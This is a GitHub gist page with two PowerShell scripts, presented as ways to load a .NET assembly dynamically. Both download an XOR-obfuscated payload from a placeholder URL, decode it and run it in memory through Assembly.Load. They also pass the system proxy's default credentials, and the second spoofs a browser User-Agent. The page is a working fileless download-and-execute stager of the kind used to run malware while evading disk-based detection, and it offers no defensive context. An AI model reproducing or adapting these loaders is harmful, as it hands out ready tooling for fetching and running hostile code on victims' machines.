Skip to content

Instantly share code, notes, and snippets.

@cryptonic01

cryptonic01/loadAssembly_method1.ps1

Forked from Arno0x/loadAssembly_method1.ps1
Created July 24, 2018 18:29
Show Gist options
  • Save cryptonic01/71c0cf7c661d3cafecdf54cdf880316d to your computer and use it in GitHub Desktop.
Save cryptonic01/71c0cf7c661d3cafecdf54cdf880316d to your computer and use it in GitHub Desktop.
Download ZIP
Load a .Net assembly dynamically from PowerShell
Raw
loadAssembly_method1.ps1
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
defaultProxy.Credentials = CredentialCache.DefaultCredentials;
webclient.Proxy = defaultProxy;
}
byte[] b = webclient.DownloadData("https://xxxxx");
string key = "xxxxxxxxx";
for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ key[i % key.Length]); }
string[] parameters = new string[] {"acesstoken"};
object[] args = new object[] {parameters};
Assembly a = Assembly.Load(b);
MethodInfo method = a.EntryPoint;
object o = a.CreateInstance(method.Name);
method.Invoke(o, args); }}}
"@
Add-Type -TypeDefinition $Source -Language CSharp
[LoadAssembly.LoadAssembly]::load()
Raw
loadAssembly_method2.ps1
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment